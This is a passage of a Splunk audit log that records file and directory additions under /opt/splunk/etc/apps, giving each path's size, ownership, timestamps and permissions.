action=add,path="/opt/splunk/etc/apps/search/default/data/ui/manager/accesscontrols.xml", isdir=0, size=368, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:42.350, user=n/a, action=add,path="/opt/splunk/etc/apps/search/default/data/ui/manager/accesscontrols.prod_lite.xml", isdir=0, size=380, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:40.941, user=n/a, action=add,path="/opt/splunk/etc/apps/search/default/data/ui/nav/default.xml", isdir=0, size=235, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:40.936, user=n/a, action=add,path="/opt/splunk/etc/apps/search/default/data/ui/views/table.xml", isdir=0, size=120, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:40.932, user=n/a, action=add,path="/opt/splunk/etc/apps/search/default/data/ui/views/show_source.xml", isdir=0, size=126, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:40.927, user=n/a, action=add,path="/opt/splunk/etc/apps/search/default/data/ui/views/show_source.prod_lite.xml", isdir=0, size=126, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:40.923, user=n/a, action=add,path="/opt/splunk/etc/apps/search/default/data/ui/views/search.xml", isdir=0, size=121, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:40.919, user=n/a, action=add,path="/opt/splunk/etc/apps/search/default/data/ui/views/reports.xml", isdir=0, size=122, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:40.909, user=n/a, action=add,path="/opt/splunk/etc/apps/search/default/data/ui/views/report_builder_print.xml", isdir=0, size=143, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:40.905, user=n/a, action=add,path="/opt/splunk/etc/apps/search/default/data/ui/views/report_builder_format_report.xml", isdir=0, size=232, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:40.901, user=n/a, action=add,path="/opt/splunk/etc/apps/search/default/data/ui/views/report_builder_display.xml", isdir=0, size=141, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:40.898, user=n/a, action=add,path="/opt/splunk/etc/apps/search/default/data/ui/views/report_builder_define_data.xml", isdir=0, size=206, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:40.893, user=n/a, action=add,path="/opt/splunk/etc/apps/search/default/data/ui/views/report.xml", isdir=0, size=140, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:40.889, user=n/a, action=add,path="/opt/splunk/etc/apps/search/default/data/ui/views/pivot.xml", isdir=0, size=123, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:40.884, user=n/a, action=add,path="/opt/splunk/etc/apps/search/default/data/ui/views/orphaned_scheduled_searches.xml", isdir=0, size=741, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:40.880, user=n/a, action=add,path="/opt/splunk/etc/apps/search/default/data/ui/views/mod_setup.xml", isdir=0, size=123, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:40.876, user=n/a, action=add,path="/opt/splunk/etc/apps/search/default/data/ui/views/live_tail.xml", isdir=0, size=126, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:40.872, user=n/a, action=add,path="/opt/splunk/etc/apps/search/default/data/ui/views/licenseusage.xml", isdir=0, size=152, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:40.867, user=n/a, action=add,path="/opt/splunk/etc/apps/search/default/data/ui/views/job_manager.xml", isdir=0, size=125, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:40.863, user=n/a, action=add,path="/opt/splunk/etc/apps/search/default/data/ui/views/job_details_dashboard.xml", isdir=0, size=24618, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:40.859, user=n/a, action=add,path="/opt/splunk/etc/apps/search/default/data/ui/views/integrity_check_of_installed_files.xml", isdir=0, size=3710, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:40.855, user=n/a, action=add,path="/opt/splunk/etc/apps/search/default/data/ui/views/flashtimeline.xml", isdir=0, size=218, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:40.851, user=n/a, action=add,path="/opt/splunk/etc/apps/search/default/data/ui/views/field_extractor.xml", isdir=0, size=130, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:40.847, user=n/a, action=add,path="/opt/splunk/etc/apps/search/default/data/ui/views/datasets.xml", isdir=0, size=123, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:40.843, user=n/a, action=add,path="/opt/splunk/etc/apps/search/default/data/ui/views/dataset.xml", isdir=0, size=122, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:40.838, user=n/a, action=add,path="/opt/splunk/etc/apps/search/default/data/ui/views/data_models.xml", isdir=0, size=116, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:40.833, user=n/a, action=add,path="/opt/splunk/etc/apps/search/default/data/ui/views/data_model_manager.xml", isdir=0, size=154, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:40.827, user=n/a, action=add,path="/opt/splunk/etc/apps/search/default/data/ui/views/data_model_explorer.xml", isdir=0, size=116, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:40.824, user=n/a, action=add,path="/opt/splunk/etc/apps/search/default/data/ui/views/data_model_editor.xml", isdir=0, size=154, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:40.819, user=n/a, action=add,path="/opt/splunk/etc/apps/search/default/data/ui/views/dashboards.xml", isdir=0, size=125, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:40.815, user=n/a, action=add,path="/opt/splunk/etc/apps/search/default/data/ui/views/dashboard_live.xml", isdir=0, size=168, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:40.811, user=n/a, action=add,path="/opt/splunk/etc/apps/search/default/data/ui/views/charting.xml", isdir=0, size=171, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:40.807, user=n/a, action=add,path="/opt/splunk/etc/apps/search/default/data/ui/views/alerts.xml", isdir=0, size=121, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:40.802, user=n/a, action=add,path="/opt/splunk/etc/apps/search/default/data/ui/views/alert.xml", isdir=0, size=138, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:40.495, user=n/a, action=add,path="/opt/splunk/etc/apps/search/default/data/ui/views", isdir=1, size=4096, gid=41812, uid=41812, modtime="Sat May 1 18:45:21 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:40.491, user=n/a, action=add,path="/opt/splunk/etc/apps/search/default/data/ui/nav", isdir=1, size=4096, gid=41812, uid=41812, modtime="Sat May 1 18:45:21 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:40.488, user=n/a, action=add,path="/opt/splunk/etc/apps/search/default/data/ui/manager", isdir=1, size=12288, gid=41812, uid=41812, modtime="Sat May 1 18:45:21 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:40.484, user=n/a, action=add,path="/opt/splunk/etc/apps/search/default/data/ui", isdir=1, size=4096, gid=41812, uid=41812, modtime="Sat May 1 18:45:16 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:40.481, user=n/a, action=add,path="/opt/splunk/etc/apps/search/default/data/models", isdir=1, size=4096, gid=41812, uid=41812, modtime="Sat May 1 18:45:21 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:40.478, user=n/a, action=add,path="/opt/splunk/etc/apps/search/default/transforms.conf", isdir=0, size=276, gid=41812, uid=41812, modtime="Sat May 1 18:26:50 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:40.472, user=n/a, action=add,path="/opt/splunk/etc/apps/search/default/savedsearches.conf", isdir=0, size=1743, gid=41812, uid=41812, modtime="Sat May 1 18:26:49 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:40.469, user=n/a, action=add,path="/opt/splunk/etc/apps/search/default/restmap.conf", isdir=0, size=156, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:40.465, user=n/a, action=add,path="/opt/splunk/etc/apps/search/default/props.conf", isdir=0, size=407, gid=41812, uid=41812, modtime="Sat May 1 18:26:50 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:40.460, user=n/a, action=add,path="/opt/splunk/etc/apps/search/default/macros.conf", isdir=0, size=2868, gid=41812, uid=41812, modtime="Sat May 1 18:26:49 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:40.457, user=n/a, action=add,path="/opt/splunk/etc/apps/search/default/data", isdir=1, size=4096, gid=41812, uid=41812, modtime="Sat May 1 18:45:16 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:40.450, user=n/a, action=add,path="/opt/splunk/etc/apps/search/default/commands.conf", isdir=0, size=4320, gid=41812, uid=41812, modtime="Sat May 1 18:26:49 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:40.433, user=n/a, action=add,path="/opt/splunk/etc/apps/search/default/app.conf", isdir=0, size=535, gid=41812, uid=41812, modtime="Sat May 1 18:26:49 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:40.315, user=n/a, action=add,path="/opt/splunk/etc/apps/search/metadata/default.meta", isdir=0, size=3293, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:40.311, user=n/a, action=add,path="/opt/splunk/etc/apps/search/bin/xpath.py", isdir=0, size=2134, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r-xr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:40.307, user=n/a, action=add,path="/opt/splunk/etc/apps/search/bin/xmlunescape.py", isdir=0, size=691, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r-xr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:40.303, user=n/a, action=add,path="/opt/splunk/etc/apps/search/bin/xmlkv.py", isdir=0, size=875, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r-xr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:40.298, user=n/a, action=add,path="/opt/splunk/etc/apps/search/bin/windbag.py", isdir=0, size=7413, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r-xr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:40.292, user=n/a, action=add,path="/opt/splunk/etc/apps/search/bin/typelearner.py", isdir=0, size=18615, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r-xr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:40.288, user=n/a, action=add,path="/opt/splunk/etc/apps/search/bin/trendline.py", isdir=0, size=3088, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r-xr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:40.284, user=n/a, action=add,path="/opt/splunk/etc/apps/search/bin/sumindexoverlap.py", isdir=0, size=6535, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r-xr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:40.279, user=n/a, action=add,path="/opt/splunk/etc/apps/search/bin/streambag.py", isdir=0, size=7363, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r-xr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:40.274, user=n/a, action=add,path="/opt/splunk/etc/apps/search/bin/sendemail_handler.py", isdir=0, size=4709, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r-xr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:40.269, user=n/a, action=add,path="/opt/splunk/etc/apps/search/bin/sendemail.py", isdir=0, size=69156, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r-xr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:40.265, user=n/a, action=add,path="/opt/splunk/etc/apps/search/bin/searchtxn.py", isdir=0, size=11115, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r-xr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:40.261, user=n/a, action=add,path="/opt/splunk/etc/apps/search/bin/scrub.py", isdir=0, size=13675, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r-xr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:40.256, user=n/a, action=add,path="/opt/splunk/etc/apps/search/bin/runshellscript.py", isdir=0, size=10651, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r-xr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:40.252, user=n/a, action=add,path="/opt/splunk/etc/apps/search/bin/return.py", isdir=0, size=4800, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r-xr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:40.249, user=n/a, action=add,path="/opt/splunk/etc/apps/search/bin/reltime.py", isdir=0, size=1786, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r-xr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:40.244, user=n/a, action=add,path="/opt/splunk/etc/apps/search/bin/rawstats.py", isdir=0, size=4186, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r-xr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:40.240, user=n/a, action=add,path="/opt/splunk/etc/apps/search/bin/predict.py", isdir=0, size=41355, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r-xr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:40.236, user=n/a, action=add,path="/opt/splunk/etc/apps/search/bin/indextimerange.py", isdir=0, size=683, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r-xr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:40.233, user=n/a, action=add,path="/opt/splunk/etc/apps/search/bin/iconify.py", isdir=0, size=901, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r-xr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:40.229, user=n/a, action=add,path="/opt/splunk/etc/apps/search/bin/gauge.py", isdir=0, size=1108, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r-xr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:40.226, user=n/a, action=add,path="/opt/splunk/etc/apps/search/bin/erex.py", isdir=0, size=3294, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r-xr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:40.223, user=n/a, action=add,path="/opt/splunk/etc/apps/search/bin/diff.py", isdir=0, size=7022, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r-xr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:40.220, user=n/a, action=add,path="/opt/splunk/etc/apps/search/bin/deseasonal.py", isdir=0, size=3376, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r-xr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:40.216, user=n/a, action=add,path="/opt/splunk/etc/apps/search/bin/createrss.py", isdir=0, size=5783, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r-xr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:40.212, user=n/a, action=add,path="/opt/splunk/etc/apps/search/bin/bucketdir.py", isdir=0, size=6730, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r-xr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:40.007, user=n/a, action=add,path="/opt/splunk/etc/apps/search/static/appIcon_2x.png", isdir=0, size=3556, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:40.003, user=n/a, action=add,path="/opt/splunk/etc/apps/search/static/appIconAlt_2x.png", isdir=0, size=2547, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:39.999, user=n/a, action=add,path="/opt/splunk/etc/apps/search/static/appIconAlt.png", isdir=0, size=1981, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:39.995, user=n/a, action=add,path="/opt/splunk/etc/apps/search/static/appIcon.png", isdir=0, size=3167, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:39.891, user=n/a, action=add,path="/opt/splunk/etc/apps/search/lookups/geo_us_states.kmz", isdir=0, size=736753, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:39.888, user=n/a, action=add,path="/opt/splunk/etc/apps/search/lookups/geo_countries.kmz", isdir=0, size=2685498, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:39.881, user=n/a, action=add,path="/opt/splunk/etc/apps/search/lookups/geo_attr_us_states.csv", isdir=0, size=832, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:39.878, user=n/a, action=add,path="/opt/splunk/etc/apps/search/lookups/geo_attr_countries.csv", isdir=0, size=18053, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:39.873, user=n/a, action=add,path="/opt/splunk/etc/apps/search/lookups/README", isdir=0, size=44, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:39.869, user=n/a, action=add,path="/opt/splunk/etc/apps/search/scripts/sub-example.ss", isdir=0, size=454, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:39.864, user=n/a, action=add,path="/opt/splunk/etc/apps/search/static", isdir=1, size=4096, gid=41812, uid=41812, modtime="Sat May 1 18:45:21 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:39.860, user=n/a, action=add,path="/opt/splunk/etc/apps/search/scripts", isdir=1, size=4096, gid=41812, uid=41812, modtime="Sat May 1 18:45:21 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:39.856, user=n/a, action=add,path="/opt/splunk/etc/apps/search/metadata", isdir=1, size=4096, gid=41812, uid=41812, modtime="Sat May 1 18:45:21 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:39.853, user=n/a, action=add,path="/opt/splunk/etc/apps/search/lookups", isdir=1, size=4096, gid=41812, uid=41812, modtime="Sat May 1 18:45:21 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:39.849, user=n/a, action=add,path="/opt/splunk/etc/apps/search/default", isdir=1, size=4096, gid=41812, uid=41812, modtime="Sat May 1 18:45:21 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:39.845, user=n/a, action=add,path="/opt/splunk/etc/apps/search/bin", isdir=1, size=4096, gid=41812, uid=41812, modtime="Sat May 1 18:45:21 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:39.841, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver", isdir=1, size=4096, gid=41812, uid=41812, modtime="Sat May 1 18:45:16 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:39.735, user=n/a, action=add,path="/opt/splunk/etc/apps/introspection_generator_addon/default/server.conf", isdir=0, size=725, gid=41812, uid=41812, modtime="Sat May 1 18:26:50 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:39.731, user=n/a, action=add,path="/opt/splunk/etc/apps/introspection_generator_addon/default/inputs.conf", isdir=0, size=180, gid=41812, uid=41812, modtime="Sat May 1 18:26:50 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:39.727, user=n/a, action=add,path="/opt/splunk/etc/apps/introspection_generator_addon/default/app.conf", isdir=0, size=215, gid=41812, uid=41812, modtime="Sat May 1 18:26:49 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:39.723, user=n/a, action=add,path="/opt/splunk/etc/apps/introspection_generator_addon/default/README", isdir=0, size=938, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:39.719, user=n/a, action=add,path="/opt/splunk/etc/apps/introspection_generator_addon/bin/collector.path", isdir=0, size=53, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r-xr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:39.715, user=n/a, action=add,path="/opt/splunk/etc/apps/introspection_generator_addon/default", isdir=1, size=4096, gid=41812, uid=41812, modtime="Sat May 1 18:45:21 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:39.711, user=n/a, action=add,path="/opt/splunk/etc/apps/introspection_generator_addon/bin", isdir=1, size=4096, gid=41812, uid=41812, modtime="Sat May 1 18:45:21 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:39.705, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_archiver/default/data/ui/views/splunk_archiver_dashboard.xml", isdir=0, size=20175, gid=41812, uid=41812, modtime="Sat May 1 18:22:53 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:39.601, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_archiver/default/data/ui/views", isdir=1, size=4096, gid=41812, uid=41812, modtime="Sat May 1 18:45:21 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:39.598, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_archiver/default/data/ui", isdir=1, size=4096, gid=41812, uid=41812, modtime="Sat May 1 18:45:16 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:39.593, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_archiver/default/searchbnf.conf", isdir=0, size=981, gid=41812, uid=41812, modtime="Sat May 1 18:25:57 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:39.589, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_archiver/default/savedsearches.conf", isdir=0, size=130, gid=41812, uid=41812, modtime="Sat May 1 18:22:53 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:39.585, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_archiver/default/props.conf", isdir=0, size=128, gid=41812, uid=41812, modtime="Sat May 1 18:22:53 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:39.581, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_archiver/default/distsearch.conf", isdir=0, size=68, gid=41812, uid=41812, modtime="Sat May 1 18:22:53 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:39.577, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_archiver/default/data", isdir=1, size=4096, gid=41812, uid=41812, modtime="Sat May 1 18:45:16 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:39.573, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_archiver/default/commands.conf", isdir=0, size=382, gid=41812, uid=41812, modtime="Sat May 1 18:22:53 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:39.569, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_archiver/default/app.conf", isdir=0, size=302, gid=41812, uid=41812, modtime="Sat May 1 18:22:53 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:39.564, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_archiver/metadata/default.meta", isdir=0, size=219, gid=41812, uid=41812, modtime="Sat May 1 18:22:53 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:39.560, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_archiver/bin/vixutils_duplicate.py", isdir=0, size=2351, gid=41812, uid=41812, modtime="Sat May 1 18:22:53 2021", mode="r-xr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:39.557, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_archiver/bin/splunkio_duplicate.py", isdir=0, size=1976, gid=41812, uid=41812, modtime="Sat May 1 18:22:53 2021", mode="r-xr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:39.553, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_archiver/bin/erp_launcher_duplicate.py", isdir=0, size=14896, gid=41812, uid=41812, modtime="Sat May 1 18:22:53 2021", mode="r-xr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:39.549, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_archiver/bin/copybuckets.py", isdir=0, size=1580, gid=41812, uid=41812, modtime="Sat May 1 18:22:53 2021", mode="r-xr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:39.546, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_archiver/bin/coldToFrozen.sh", isdir=0, size=412, gid=41812, uid=41812, modtime="Sat May 1 18:22:53 2021", mode="r-xr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:39.542, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_archiver/bin/archivebuckets.py", isdir=0, size=6267, gid=41812, uid=41812, modtime="Sat May 1 18:22:53 2021", mode="r-xr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:39.437, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_archiver/metadata", isdir=1, size=4096, gid=41812, uid=41812, modtime="Sat May 1 18:45:21 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:39.434, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_archiver/default", isdir=1, size=4096, gid=41812, uid=41812, modtime="Sat May 1 18:45:21 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:39.430, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_archiver/bin", isdir=1, size=4096, gid=41812, uid=41812, modtime="Sat May 1 18:45:21 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:39.426, user=n/a, action=add,path="/opt/splunk/etc/apps/user-prefs/default/user-prefs.conf", isdir=0, size=793, gid=41812, uid=41812, modtime="Sat May 1 18:26:50 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:39.422, user=n/a, action=add,path="/opt/splunk/etc/apps/user-prefs/default/app.conf", isdir=0, size=52, gid=41812, uid=41812, modtime="Sat May 1 18:26:50 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:39.416, user=n/a, action=add,path="/opt/splunk/etc/apps/user-prefs/metadata/default.meta", isdir=0, size=109, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:39.312, user=n/a, action=add,path="/opt/splunk/etc/apps/user-prefs/metadata", isdir=1, size=4096, gid=41812, uid=41812, modtime="Sat May 1 18:45:21 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 